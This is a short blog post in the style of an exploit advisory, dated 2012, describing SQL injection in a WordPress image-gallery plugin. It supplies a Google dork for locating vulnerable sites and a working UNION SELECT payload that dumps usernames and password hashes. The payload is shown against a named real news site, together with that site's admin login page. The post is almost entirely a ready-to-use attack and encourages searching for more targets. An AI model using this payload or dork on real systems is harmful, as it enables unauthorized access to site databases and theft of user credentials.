[+] Exploit Title : Word Press image-gallery plugin Sql Injection
[+] Google Dork : inurl:image-gallery/?gallery_id=
[+] Autor : Mr.XpR
[+] Download : http://wordpress.org
[+] Contact : No0PM@yahoo.com
[+] Researcher Team : IRaNHaCK Security Team
[+] Bug Level : High (Sql)
[+] Test : 7 , Linux Back Track
##################################################################
[+]Exploit
[-] http://Site.Com/[Patch]image-gallery/?gallery_id=[Sqli]
[+]Inject
[-]
http://www.ucanews.com/image-gallery/?gallery_id=999+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5
,6+from+uca_users
[+]Login
[-] http://www.ucanews.com/wp-login.php
[+]Example :
[-]
http://www.ucanews.com/image-gallery/?gallery_id=999+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5
,6+from+uca_users
[-] More In Google ...
Wednesday, July 11, 2012
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment